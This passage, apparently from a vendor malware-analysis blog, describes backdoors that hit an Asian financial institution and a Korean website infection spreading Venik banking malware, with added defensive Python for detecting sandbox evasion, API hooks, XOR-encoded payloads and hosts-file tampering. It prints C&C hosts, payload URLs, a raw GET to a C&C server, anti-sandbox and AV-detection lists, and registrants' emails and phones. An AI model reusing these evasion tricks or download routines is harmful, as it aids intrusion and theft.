To defeat a sandbox, this malware delays execution through sleeps or loops, because it knows a sandbox will only run the malware for a short, limited amount of time. By contrast, once inside your system, the malware has the luxury of time to carry out its malicious intent. To counter this, sandboxes employ acceleration: if they detect that a sample uses a delay, they shorten it. For example, if the sample sleeps for 1 minute, the sandbox changes it to sleep for 1 second. Unfortunately, against this malware that technique does not work. It detects sleep acceleration by issuing a sleep, measuring the time elapsed afterwards, and checking whether the elapsed time is lower than the requested sleep time.
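The lesson for sandbox designers is that shortening a sleep is only safe if every time source the sample can read moves forward by the requested amount. The Python below is an added model of this (not code from the post or from the sample): a clock class standing in for the sandbox's hooked Sleep() and GetTickCount()-style reads, the elapsed-time comparison the post describes, and a run against three designs. The clock classes and the 100x acceleration factor are assumptions made for the example; only virtual time is used, so nothing actually blocks.

```python
class SandboxClock:
    """Model of the time sources a sample sees inside a sandbox.

    sleep_ms() stands in for a hooked Sleep(); now_ms() for a tick-count read.
    accelerate: the sandbox shortens sleeps (the trick described in the post).
    consistent: the sandbox also advances the visible clock by the requested time.
    """

    ACCELERATION = 100  # assumed factor: 1 minute becomes 600 ms

    def __init__(self, accelerate: bool, consistent: bool):
        self.accelerate = accelerate
        self.consistent = consistent
        self._tick = 0

    def sleep_ms(self, requested: int) -> None:
        actual = requested // self.ACCELERATION if self.accelerate else requested
        # A consistent sandbox reports the requested time as having passed;
        # a naive one reports only the time it really waited.
        if self.accelerate and self.consistent:
            self._tick += requested
        else:
            self._tick += actual

    def now_ms(self) -> int:
        return self._tick


def looks_accelerated(clock: SandboxClock, requested_ms: int = 60_000) -> bool:
    """The check the post describes: sleep, measure elapsed time, compare with what was asked."""
    start = clock.now_ms()
    clock.sleep_ms(requested_ms)
    elapsed = clock.now_ms() - start
    return elapsed < requested_ms


def evaluate_sandbox_designs() -> dict:
    """Run the check against three environments; True means the sample would notice and bail out."""
    return {
        "real_host": looks_accelerated(SandboxClock(accelerate=False, consistent=False)),
        "naive_acceleration": looks_accelerated(SandboxClock(accelerate=True, consistent=False)),
        "consistent_acceleration": looks_accelerated(SandboxClock(accelerate=True, consistent=True)),
    }


if __name__ == "__main__":
    for design, detected in evaluate_sandbox_designs().items():
        print(f"{design}: {'detected' if detected else 'passes'}")
```

The model deliberately has a single clock; a real sandbox has to keep every readable source in step (tick counts, the system time, high-resolution performance counters, the time stamp counter), and a mismatch between any two of them is enough for the same comparison to fire.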

 

 

Detects API hooks

Sandboxes also hook APIs to observe the behaviour of a file. This malware detects hooks by checking whether the first instruction of a given API is a jmp, a call or a push/retn. It checks whether the first byte at the API address is one of the following:

  • E8
  • E9
  • EB
  • FF
  • 68????????C3 (push retn)
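The same prologue check is what a defender runs in the other direction: an EDR self-integrity test, or an analyst comparing in-memory export prologues with the on-disk image, decodes the first instruction and resolves where a detour leads. The Python below is an added example (not code from the post or the sample) that decodes the five forms listed above and computes the transfer target for the ones that encode it; the export names, addresses and prologue bytes are constructed for the example.

```python
def classify_prologue(code: bytes, address: int) -> dict:
    """Decode the first instruction at an API entry and report whether it is one of the
    control transfers the post lists (call/jmp rel32, jmp rel8, FF-indirect, push imm32/ret)."""
    if not code:
        raise ValueError("empty prologue")
    b0 = code[0]
    if b0 in (0xE8, 0xE9) and len(code) >= 5:
        rel = int.from_bytes(code[1:5], "little", signed=True)
        kind = "call rel32" if b0 == 0xE8 else "jmp rel32"
        return {"hooked": True, "kind": kind, "target": (address + 5 + rel) & 0xFFFFFFFF}
    if b0 == 0xEB and len(code) >= 2:
        rel = int.from_bytes(code[1:2], "little", signed=True)
        return {"hooked": True, "kind": "jmp rel8", "target": (address + 2 + rel) & 0xFFFFFFFF}
    if b0 == 0xFF and len(code) >= 6 and code[1] == 0x25:
        # jmp dword ptr [imm32]: what we can decode here is the pointer slot, not its content
        return {"hooked": True, "kind": "jmp [imm32]", "target": int.from_bytes(code[2:6], "little")}
    if b0 == 0xFF:
        # The post's check treats any FF-prefixed opcode (indirect jmp/call forms) as a hook.
        return {"hooked": True, "kind": "FF-prefixed indirect transfer", "target": None}
    if b0 == 0x68 and len(code) >= 6 and code[5] == 0xC3:
        return {"hooked": True, "kind": "push imm32; ret", "target": int.from_bytes(code[1:5], "little")}
    return {"hooked": False, "kind": "normal prologue", "target": None}


def audit_exports(exports: dict) -> dict:
    """Run the classifier over {name: (address, prologue_bytes)} and keep only the hooked entries."""
    hooked = {}
    for name, (addr, code) in exports.items():
        verdict = classify_prologue(code, addr)
        if verdict["hooked"]:
            hooked[name] = verdict
    return hooked


# Constructed prologues; the addresses and bytes are made up for the example.
SAMPLE_EXPORTS = {
    # mov edi, edi ; push ebp ; mov ebp, esp : the classic hot-patchable prologue, untouched
    "Sleep":          (0x10001200, bytes.fromhex("8BFF558BEC")),
    # jmp rel32 to +0x100 : an inline detour
    "CreateFileW":    (0x10001000, bytes.fromhex("E900010000")),
    # push 0x12345678 ; ret
    "GetTickCount":   (0x10001400, bytes.fromhex("6878563412C3")),
    # jmp dword ptr [0x10002000]
    "VirtualProtect": (0x10001600, bytes.fromhex("FF2500200010")),
}

if __name__ == "__main__":
    for name, verdict in audit_exports(SAMPLE_EXPORTS).items():
        target = verdict["target"]
        print(f"{name}: {verdict['kind']}"
              + (f" -> {target:#010x}" if target is not None else ""))
```

A first-byte check is crude in both directions: it misses hooks placed past the first instruction and flags exports whose legitimate first instruction happens to be a jump (some forwarders and thunks). Reading back the original bytes from the on-disk module and comparing a longer prefix is the more reliable integrity test.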

 

 

Payload

The injected code is a backdoor that communicates to the following C&C servers:

  • bbs.gokickes.com:80
  • img.lifesolves.com:8080
  • domain.gokickes.com:443

 

Depending on the backdoor commands, this malware is capable of the following:

  • Download and execute additional files
  • Capture screenshots
  • Capture mouse and keyboard events
  • Update itself
  • Open a remote shell
  • Terminate processes
  • Enumerate network shares
  • Enumerate drives
  • Uninstall itself

Lastly, all data sent to and received from the server is encrypted with the XOR key 0xD5.
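Both XOR layers in this sample (the 0x89 key on the embedded DLL described earlier and the 0xD5 key on the C&C channel) are single-byte XOR, which an analyst can undo without reversing the key out of the code: a PE image leaks the key through its MZ/PE headers and its long runs of zero padding. The Python below is an added example (not code from the post or the sample) that recovers the key of a constructed, XOR-encoded PE stub by known plaintext, falls back to trying all 256 keys, and shows the zero-padding shortcut; the same xor_bytes() then decodes C&C captures once the key is known. The embedded stub is constructed and is not a real DLL.

```python
import struct
from collections import Counter


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def looks_like_pe(data: bytes) -> bool:
    """Cheap structural check: MZ stub, e_lfanew inside the buffer, PE\\0\\0 at that offset."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_xor_key(blob: bytes):
    """Return the single-byte key under which `blob` decodes to a PE image, else None."""
    head = blob[:0x400]  # the headers are all the check needs
    # Known plaintext: the first byte of any PE is 'M', so blob[0] ^ 'M' is the candidate key.
    candidate = head[0] ^ ord("M") if head else None
    if candidate is not None and looks_like_pe(xor_bytes(head, candidate)):
        return candidate
    # Fall back to exhaustive search (cheap: 256 keys).
    for key in range(256):
        if looks_like_pe(xor_bytes(head, key)):
            return key
    return None


def most_common_byte(blob: bytes) -> int:
    """Zero padding in the plaintext becomes runs of the key byte in the ciphertext,
    so the most frequent byte is usually the key (a hint, confirmed by recover_xor_key)."""
    return Counter(blob).most_common(1)[0][0]


def _constructed_pe_stub() -> bytes:
    """MZ header with e_lfanew=0x80, a PE signature and zero padding; not a real DLL."""
    header = bytearray(0x80)
    header[0:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x80)
    return bytes(header) + b"PE\0\0" + b"\0" * 0x100


# The embedded DLL as the malware stores it: XOR-encoded with 0x89 (the key the post names).
EMBEDDED_BLOB = xor_bytes(_constructed_pe_stub(), 0x89)

if __name__ == "__main__":
    key = recover_xor_key(EMBEDDED_BLOB)
    print(f"recovered key: {key:#04x}, most common byte: {most_common_byte(EMBEDDED_BLOB):#04x}")
    # Decoding a C&C capture works the same way once the key (0xD5 here) is known.
    print(xor_bytes(xor_bytes(b"constructed beacon", 0xD5), 0xD5))
```

For the C&C channel there is no MZ header to test against, so the key comes from the sample itself (0xD5, per the analysis above) and the frequency hint is weaker; a decoded capture that yields readable hostnames or command strings is the confirmation there.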

 

 

mslives.exe

This sample has a similar file structure to GoogleUpdate.exe but does not employ the same anti-sandbox tricks.

When first run, it sleeps for 300 seconds before doing its installation routine. Afterwards, it creates a copy of itself as follows:

  • %ProgramFiles%\Windows NT\Accessories\Microsoft\mslives.exe

The copy, however, is written with a large amount of garbage data at the end of the file, which balloons its size to more than 100MB: it writes 100KB of data to the file 1000 times. This behaviour tries to evade sandboxes in two ways. First, the malware technically does not create an exact copy of itself, which makes its behaviour unusual and may look benign to a sandbox, since the usual malware behaviour is to create an exact copy. Second, the many write events might exceed the sandbox’s event limit, and the size of the dropped copy makes it look unsuspicious to the sandbox.
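A dropped file whose bytes are almost entirely overlay (data past the end of the last section) is easy to spot from the PE headers alone, and that is a check a sandbox or triage script can apply to every written executable regardless of its size. The Python below is an added example (not code from the post or the sample) that builds a minimal, constructed PE32 image, appends padding the way the post describes (scaled down to 1 KB x 1000 writes so the example stays small), and compares the section table's end with the real file size.

```python
import struct


def _build_minimal_pe(section_size: int = 0x200) -> bytes:
    """Constructed PE32 with one section; just enough structure for the size check below."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)   # i386, 1 section, PE32 opt hdr
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    raw_ptr = 0x200
    sect = struct.pack("<8sIIIIIIHHI", b".text\0\0\0", 0x1000, 0x1000,
                       section_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect).ljust(raw_ptr, b"\0")
    return headers + bytes([0x90]) * section_size                     # NOPs stand in for code


def pe_overlay(data: bytes) -> dict:
    """Compare the end of the last section (from the section table) with the real file size."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    image_end = 0
    for i in range(nsections):
        # SizeOfRawData and PointerToRawData sit at offsets 16 and 20 of each 40-byte entry
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        image_end = max(image_end, raw_ptr + raw_size)
    overlay = max(len(data) - image_end, 0)
    return {
        "file_size": len(data),
        "image_end": image_end,
        "overlay_bytes": overlay,
        "overlay_ratio": overlay / len(data),
    }


def looks_size_padded(data: bytes, min_ratio: float = 0.9) -> bool:
    """Flag files that are overwhelmingly overlay, the pattern the post describes."""
    return pe_overlay(data)["overlay_ratio"] >= min_ratio


# Constructed samples: a clean image and the same image with 1000 appended 1 KB writes.
CLEAN_PE = _build_minimal_pe()
PADDED_PE = CLEAN_PE + bytes(range(256)) * 4 * 1000

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_PE), ("padded", PADDED_PE)):
        info = pe_overlay(sample)
        print(f"{label}: size={info['file_size']} image_end={info['image_end']} "
              f"overlay={info['overlay_bytes']} ({info['overlay_ratio']:.1%}) "
              f"padded={looks_size_padded(sample)}")
```

Legitimate files do carry overlays (Authenticode signatures, installer archives), so the ratio threshold matters: the point is not any overlay but one that dwarfs the mapped image, and a sandbox that hashes only the mapped sections rather than the whole file will still match the dropped copy to its parent despite the padding.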

 

It executes its dropped copy using CreateProcess, then checks whether it is running as iexplore.exe; if not, it creates a suspended iexplore.exe process and injects its code into it by overwriting iexplore.exe’s main module.

It creates a hidden window with window name and class name “111111”.

It then creates the autostart registry entry below so that it runs at every startup.

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: msliveupdate
    • Data: %ProgramFilesDir%\Windows NT\Accessories\Microsoft\mslives.exe

 

Payload

This sample has only one purpose: to download and execute a file from forum.energymice.com.

GET /view/login.asp HTTP/1.1

Content-Type: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; 5.1)

Host: forum.energymice.com

Cache-Control: no-cache

It downloads the file to the %TEMP% folder and executes it. Unfortunately, at the time of our analysis the download URL was not returning any binary.

 

winhost.exe

Unlike the other files, this one is clearly packed. PEiD identifies the packer as follows:

  • ASProtect 1.2x – 1.3x [Registered] -> Alexey Solodovnikov

This file is a backdoor named “HDOOR”, as we found this string in its body. We also found other interesting strings which indicate the protector used.

  • HDoor, Version 1.0
  • Copyright (C) 2013
  • (c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com.

This backdoor listens on port 143 and waits for a client to connect and issue commands. Port 143 is the default unencrypted IMAP port; IMAP (Internet Message Access Protocol) is a mail protocol used for accessing email on a remote server from a local client.

It checks whether the user is an admin. If so, it installs itself as a service and drops a copy in the following directory:

  • %ProgramFiles%\Common Files\System\NT\lib\winhost.exe

If the user is not an admin, it installs itself as follows and creates an autostart entry in the registry.

  • %USERPROFILE%\System\winhost.exe

Autostart Registry Entry:

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: Microsoft Messenger
    • Data: %USERPROFILE%\System\winhost.exe

 

Payload


 

 

Depending on the attacker’s command, it is capable of performing the following:

  • Disconnect
  • Get backdoor install path
  • List directory or files
  • Type a txt file content
  • Execute A Program
  • Download A File
  • Get A CMD Shell
  • Exit CMD Shell
  • Upload a file
  • Download a file
  • Load dll library
  • Free dll library

 

nethost.exe

It installs a copy of itself as follows, depending on whether the user is an admin:

If user is admin:

  • %ProgramFiles%\common files\system\library\nethost.exe

Installs itself as a service:

  • HKLM\System\CurrentControlSet\Services\ncoglsse
    • DisplayName = Microsoft Wireless Device Service
    • ImagePath = %ProgramFiles%\common files\system\library\nethost.exe

If not admin:

  • %USERPROFILE%\system\library\nethost.exe

It creates the following autostart key:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: “ncoglsse”
    • Data: %ProgramFiles%\common files\system\library\nethost.exe


After installation, it injects into lsass.exe to stay memory-resident and executes its payload.

Payload

It downloads from the following URLs:

  • http://hud321.astringer.com/images/log.gif
  • http://grop.waterglue.org/images/logg.gif
  • http://hud.astringer.com/images/log.gif

The downloaded files contain encrypted URLs that it uses to reach its C&C. The malware connects to such a URL using HTTP POST and sends the following information:

  • IP address
  • Language ID
  • Malware version
  • OS version
  • Machine name

 

It receives commands from the C&C and is capable of the following:

  • Collect information about the drives and folders on the PC
  • List files
  • Download files
  • Terminate processes
  • Open a CMD shell

 

Shell64.dll  

Shell64_u.dll – Loader Component

The loader component runs as a service, loads the espionage component and makes sure the infection stays intact. The service, including its name, is configured by the malware dropper, which was not known at the time of writing. Strings embedded in the loader component suggest the binary is packed with the Dyamar binary protector, but the binary does not give the impression of being thoroughly protected.

Simple obfuscation elements introduced by macros, and a number of obfuscated strings, show attempts to complicate the analysis but are easily bypassed. The binary also comes with three dummy exports, which show more of the obfuscation elements. Interestingly, the binary keeps a log file located at C:\debug.txt, to which debug messages are written. This is rather uncommon for binaries found in the wild.

The ServiceMain method directs execution to one of the exports: ‘LoadFunc’ for Windows OS versions below 6.0, or ‘win7load’ for 6.0 and above. These exports load the espionage component, running it via a spawned rundll32.exe process with the appropriate parameters set. This second-stage binary exports two functions, ‘main’ and ‘lowmain’, which are again suited to OS versions below and above 6.0.


 

Shell64.dll – Espionage Component

The espionage component comes with the internal name ‘Server.dll’. It exports the functions ‘main’ and ‘lowmain’, where main serves OS versions 6.0 and above, while lowmain serves versions below 6.0. Just like the loader component, this binary creates and maintains the file C:\debug.txt, where debugging information is written.

During startup shell64.dll creates a named mutex, dubbed ‘Global\\KongQi [TickCount]’, where TickCount is the time stamp at the time of infection. The malware also creates a named view, dubbed ‘_kaspersky’, which is used to exchange runtime information among threads and intruded processes. The name is doubtlessly chosen to add stealth.


During startup the malware gathers information about the infected system and sends it to its remote server. The information includes:

  • Hostname
  • System CPU power
  • OS version
  • Drive geometry for PHYSICALDRIVE0
  • Global memory status
  • Video capture driver description
  • Installed security products based on running processes list

 

Security Product Enumeration

The list of products to be searched for is long:

Process Name                          Anti-Virus
fsav32.exe, MsMpEng.exe               F-Secure
FPAVServer.exe                        F-PROT
BullGuardScanner.exe                  BullGuard
vrmonsvc.exe                          ViRobot
AYRTSrv.aye                           ALYac
V3lsvc.exe                            V3Lite
Kxetray.exe                           King
KSafeSvc.exe                          King Defender
TMBMSRV.exe                           Trend
knsdtray.exe, FilMsg.exe, V3SP.exe    Keniu
RavMonD.exe                           Rising
KvMonXP.exe                           JiangMin
Mcshield.exe                          McAfee
avgnsx.exe                            NOD32
AvastSvc.exe                          Avast!
dwengine.exe                          Dr.Web
secenter.exe                          BitDefender
avguard.exe                           Avira
ccSvcHst.exe                          Norton
avp.exe                               Kaspersky
360sd.exe                             360 Antivirus
360tray.exe                           360 Defender

 

The following firewall installations will also be enumerated:

  • Norton Personal Firewall        
  • ZoneAlarm                       
  • Comodo Firewall                 
  • eTrust EZ Firewall              
  • F-Secure Internet Security      
  • McAfee Personal Firewall        
  • Outpost Personal Firewall       
  • Panda Internet Security Suite
  • Panda Anti-Virus/Firewall
  • BitDefender/Bull Guard Antivirus
  • Rising Firewall                 
  • 360Safe AntiArp

 

Espionage Capabilities

Once set up and running, the malware waits for instructions from its remote servers. Its capabilities are plentiful, and all of them are designed to steal data from the infected system. Stolen information is compressed with the deflate algorithm and sent to a remote server. The analyzed functions are as follows:

  • Video Captures using a capture window named CVideoCap while compressing the video using the Windows VCM API (Video Compression Manager)
  • Sound captures from the system’s sound input device, i.e. microphone
  • Stealing data from the current desktop’s clipboard, which can yield passwords from password managers
  • Capture screenshots and compress them, exfiltrate as a stream
  • The sample includes a userland keylogger, setting a global Windows hook via SetWindowsHookEx to listen for keyboard events, which are parsed through Windows IMM API (Input Method Manager); keystrokes are dumped to a file named ‘jpjl.dat’, created within the Windows system directory
  • Clear event logs for ‘Application’, ‘Security’ and ‘System’, which is usually done to erase forensic evidence of an intrusion
  • Shut the system down, which eventually forces a reboot
  • Create a local user account with the description ‘This user account is used by the Visual Studio .NET Debugger’
  • Download files and execute them
  • Execute other binaries from disk
  • Enumerate files and file attributes on the system, modify and delete files and directories
  • Enumerate window names of open applications
  • Enumerate system attributes like OS version, CPU power or memory capacities of the disk, system up time, number of processors, names of running processes while matching for security products, computer name, user name of the current user, attached drives
  • Enumerating parameters for dial-up connections, such as phone number and device name
  • Enable terminal services and allow remote connections
  • Pop message boxes
  • Open a socket for sending and receiving data
  • Delete its files and persistence mechanisms from the machine, i.e. uninstall the service and remove an auto-run registry key located under [HKLM]\..\CurrentVersion\Run named ‘MSLiveMessenger’; it is unclear though, how this key is created in the first place

 

Persistence Methods

The binaries are designed to run in the context of a Windows service, which is assumed to be set up by the corresponding dropper. The service name remains unclear, as it is also set by the dropper. However, the malware comes with the capability to inject its payload into remote processes and contains a function to inject into winlogon.exe (in Windows versions prior to 6.0).

 

dllhost.exe

This malware does not do much. It only tries to download from blog.softfix.co.kr:80.


Who’s behind?

The attacker used C&C servers registered in Korea, with registration records that look fake. Some of the C&C domains are owned by hugedomains.com, a company that sells previously owned domains and offers a service that hides registrant information. We also noticed, based on the strings in the binaries, that the author is clearly not a native English speaker.

 

 

Whois Records of C&C used

bbs.gokickes.com:80, domain.gokickes.com:443 (GoogleUpdate.exe)

  • Emails: dodomonk@mail.com (a, t, r)
  • Names: smith jack (a, t, r)
  • Organizations:
  • Streets: seoul, korea (a, t, r)
  • Cities: seoul (a, t, r)
  • States: seoul (a, t, r)
  • Postals: 158070 (a, t, r)
  • Countries: KR (a, t, r)
  • Phones: 8245896312 (a, t, r)

img.lifesolves.com:8080 (GoogleUpdate.exe)

  • Emails: jimkimteen@mail.com (a, t, r)
  • Names: zhang yunqiang (a, t, r)
  • Organizations:
  • Streets: Taiping Road (a, t, r)
  • Cities: seoul (a, t, r)
  • States: seoul (a, t, r)
  • Postals: 100-744 (a, t, r)
  • Countries: KR (a, t, r)
  • Phones: 82527656289 (a, t, r)

softfix.co.kr (dllhost.exe)

  • Registrant: gson
  • Administrative Contact (AC): zhang yunqiang
  • AC E-Mail: jimkimteen@mail.com
  • Registered Date: 2014. 01. 08.
  • Last Updated Date: 2014. 01. 08.
  • Expiration Date: 2016. 01. 08.
  • Publishes: N
  • Authorized Agency: Gabia, Inc. (http://www.gabia.co.kr)
  • DNSSEC: unsigned

diskoco.com (mpsvc.exe)

  • Registrant Name: yang qi
  • Registrant Organization: yang qi
  • Registrant Street: Guancheng District No126
  • Registrant City: dong guan
  • Registrant State/Province: Guangdong
  • Registrant Postal Code: 523000
  • Registrant Country: China
  • Registrant Phone: +86.0769 89098138
  • Registrant Fax: +86.0769 89098200
  • Registrant Email: softmoon@mail.com

forum.energymice.com (mslives.exe)

  • Registrant Name: Domain Admin
  • Registrant Organization: HugeDomains.com
  • Registrant Street: 2635 Walnut Street
  • Registrant City: Denver
  • Registrant State/Province: CO
  • Registrant Postal Code: 80205
  • Registrant Country: US
  • Registrant Phone: +1.303.893.0552
  • Registrant Email: domains@hugedomains.com

astringer.com (nethost.exe)

  • Registrant Name: Domain Admin / This Domain is For Sale
  • Registrant Organization: HugeDomains.com
  • Registrant Street: 2635 Walnut Street
  • Registrant City: Denver
  • Registrant State/Province: CO
  • Registrant Postal Code: 80205
  • Registrant Country: US
  • Registrant Phone: +1.303.893.0552
  • Registrant Email: domains@hugedomains.com

waterglue.org

  • Registrant Name: Registration Private
  • Registrant Organization: Domains By Proxy, LLC
  • Registrant Street: DomainsByProxy.com
  • Registrant Street: 14747 N Northsight Blvd Suite 111, PMB 309
  • Registrant City: Scottsdale
  • Registrant State/Province: Arizona
  • Registrant Postal Code: 85260
  • Registrant Country: US
  • Registrant Phone: +1.4806242599
  • Registrant Fax: +1.4806242598
  • Registrant Email: WATERGLUE.ORG@domainsbyproxy.com

 

 

Malware doesn’t need to be advanced to be effective

These malware families are not advanced, and we have seen them before, yet they were able to infiltrate and bypass security. They were able to reside unnoticed for three months, which gives the attacker plenty of time to operate. This shows that malware does not need to be advanced or sophisticated to get through.

AV is still our best defense and blocks the majority of security events; it is just that there are so many malware attacks using so many different techniques that no single security solution will stop all of them. That is why we need multiple security solutions, and we need security people in our respective organizations.

 

Why spear phish?

The initial entry point of the malware is a spear-phishing email that targeted one of the heads of the company. According to a report from TrendMicro, spear-phishing is still the most favored APT attack bait: “APT campaigns frequently make use of spear-phishing tactics because these are essential to get high-ranking targets to open phishing emails.”

It is easy for an attacker to guess the email addresses of people in an organization, especially high-ranking officials, as their names are available online. The attackers can easily profile them by searching any available information online, and then customize the attack to the profile of the target.

As this case shows, attackers usually target the weakest point, and more often than not the weakest point is the people in our organization. The message is that to protect our organization we must also educate and train everyone within it in proper security practices, so that they do not fall for these types of social engineering attacks.

Special thanks to Marion Marschalek and the rest of the Cyphort Labs team for their help in analysis of this attack. 

 

 

The post Multiple Malwares used to Target an Asian Financial Institution appeared first on Cyphort.

Infected Korean Website Installs Banking Malware


On September 18, 2015, we saw activity on koreatimes.com where we captured a malicious binary. We investigated further and found that this campaign specifically targets Korean sites and Korean banks.

 

We looked at our logs for this year and found more Korean websites infected:

  • koreatimes.com (Sep. 18, 2015)
  • filehon.com (May 30, 2015)
  • joara.com (May 3, 2015)
  • hometax.go.kr (May 3, 2015)
  • soriaudio.co.kr (April 23, 2015)
  • gomsee.com (March 16, 2015)
  • lottoplay.co.kr (Feb 6, 2015)
  • insight.co.kr (Jan 31, 2015)
  • filecity.co.kr (Jan 23, 2015)
  • nggol.com (Jan 6, 2015)
  • koreamanse.com (Jan 6, 2015)

 

The payload we obtained also specifically targets Korean banks by modifying the infected system’s hosts file to redirect traffic for Korean banks to a server the attacker controls. This means the attacker can serve a phishing website without the user knowing they are visiting one. It also targets AhnLab by killing processes and deleting files specific to that software. AhnLab is a popular antivirus product in South Korea.

Figure: Infection Flow

 

 

Website Infection

The following analysis focuses on the infection that took place on koreatimes.com.

The culprit is a JavaScript file named “2013_gnb.js”, an iframe injector leading to the KaiXin EK landing page.


 

It exploits the following vulnerabilities:

  • CVE-2014-6332 (IE)
  • CVE-2011-3544 (Java)
  • CVE-2015-0336 (flash)

 

We found interesting strings in the Flash file which give us an idea of the platform the attacker used to build the exploit, as well as references to the attacker. The string “King Lich V” was also found in the Flash file and is likely the author’s signature; the same string has been found in other attacks involving a Chinese group. The Flash file was also packed using DoSWF.


 

Once exploitation is successful, it has two options to execute its payload. If it is running on Windows 7 or 8, it fires a PowerShell script that downloads an executable file from 199[.]188[.]106[.]161.


 

Otherwise, it executes shellcode that downloads from “www[.]jfkdsajfk5263[.]com/server[.]jpg”. The former (PowerShell) route was essentially used to bypass DEP.

The downloaded binary is banking malware with backdoor capabilities belonging to the Venik family.

 

Backdoor Venik

“Venik” is a Russian word for a besom, or broom, used in Russian bathhouses.

The downloaded binary is actually a dropper which, when executed, installs a DLL file in a C:\{random} folder under a random name such as “c:\tqcsv\krxxc.rxk”. It executes this DLL as:

  • “%system32%\rundll32.exe” “c:\tqcsv\krxxc.rxk”,Start

 

It creates a mutex (M142.0.137.66:3201) and an autostart registry entry such as:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    • EvtMgr – “c:\windows\system32\rundll32.exe “c:\tqcsv\krxxc.rxk”,Start”

After installation, it beacons out to its server by contacting the following URLs:

  • http://142[.]0[.]137[.]68:803
  • http://142[.]0[.]137[.]67:805/index.php

It also opens a connection to 142.0.137.66 on TCP port 3201 and waits for a command from the server. The server can issue a command that starts a remote access service on the infected client.


 

It also collects files from the %ProgramFiles% folder and mapped drives. It copies the files to a randomly named file in C:\ using xcopy and uploads that file to its server over an HTTP session.


It modifies the hosts file (%system32%\drivers\etc\hosts), adding entries that point Korean banking and portal sites at 142.0.137.199. This effectively redirects the user’s visits to banking sites to a site controlled by the attacker, which is actually a phishing site.


The phishing site asks for sensitive information that is not usually requested during a normal online banking session.
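The hosts-file tampering described above is easy to check for on a suspect machine. The following is an added example, not code from the original post: it parses a hosts file and flags entries that point watched banking or portal brands at a public address, one address collecting many hostnames, and malformed lines such as the bare address the malware wrote. The brand watch-list, the threshold and the sample file are assumptions built from the domains quoted in the post.

```python
"""Triage a Windows hosts file for the banking redirection pattern described above."""
import ipaddress
from collections import defaultdict

# Assumed watch-list: second-level labels of the banking and portal sites the
# post lists. Matching on this label (not the full domain) also catches the
# look-alike variants the malware added, such as .com.or, .vo.kr, .ccm and .co.ir.
WATCHED_BRANDS = {
    "shinhan", "kbstar", "knbank", "busanbank", "nonghyup", "wooribank",
    "hanabank", "epostbank", "ibk", "keb", "kfcc", "citibank",
    "standardchartered", "suhyup-bank", "kjbank", "naver", "daum", "nate",
}
MASS_REDIRECT_THRESHOLD = 5  # assumed cut-off for "one address, many hostnames"

# Constructed hosts-file excerpt modelled on the modification described above;
# the redirect address is the one reported in the post, the rest is sample data.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.168.1.10    intranet.example.local
142.0.137.199 www.shinhan.com.or
142.0.137.199 search.naver.com
142.0.137.199 www.kbstar.com.or
142.0.137.199 www.wooribank.com
142.0.137.199 www.standardchartered.vo.kr
142.0.137.199 www.hanabank.ccm
142.0.137.199
"""


def parse_hosts(text):
    """Return (entries, malformed); entries are (lineno, ip_address, hostname)."""
    entries, malformed = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()          # drop comments and padding
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            malformed.append((lineno, raw.strip()))
            continue
        if len(parts) == 1:                            # bare address, no hostname
            malformed.append((lineno, raw.strip()))
            continue
        for name in parts[1:]:
            entries.append((lineno, ip, name.lower().rstrip(".")))
    return entries, malformed


def watched_brand(hostname):
    """Return the watched brand label found in hostname, or None."""
    for label in hostname.split("."):
        if label in WATCHED_BRANDS:
            return label
    return None


def triage_hosts(text):
    """Return a list of finding dicts for the given hosts-file text."""
    entries, malformed = parse_hosts(text)
    findings = [{"kind": "malformed", "line": ln, "text": t} for ln, t in malformed]
    per_ip = defaultdict(list)
    for lineno, ip, host in entries:
        if ip.is_loopback or ip.is_private:
            continue                                   # localhost and intranet entries are normal
        per_ip[ip].append(host)
        brand = watched_brand(host)
        if brand:
            findings.append({"kind": "hijacked_brand", "line": lineno, "host": host,
                             "ip": str(ip), "brand": brand})
    for ip, hosts in per_ip.items():
        if len(hosts) >= MASS_REDIRECT_THRESHOLD:
            findings.append({"kind": "mass_redirect", "ip": str(ip), "count": len(hosts)})
    return findings


if __name__ == "__main__":
    for finding in triage_hosts(SAMPLE_HOSTS):
        print(finding)
```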


 

At times it also asks the user to visit other banking sites, which likewise lead to phishing sites. This likely happens when the phishing site does not currently support a given bank.


 

Adding to its attack on Korean services, it tries to disable AhnLab-related files and processes. AhnLab is a popular antivirus product in South Korea.


 

As of September 25, we verified that koreatimes.com is clean from this infection.

Related Samples

  • Venik Dropper: MD5 c242d641d9432f611360db36f2075f67, packer UPX, filename 66.exe
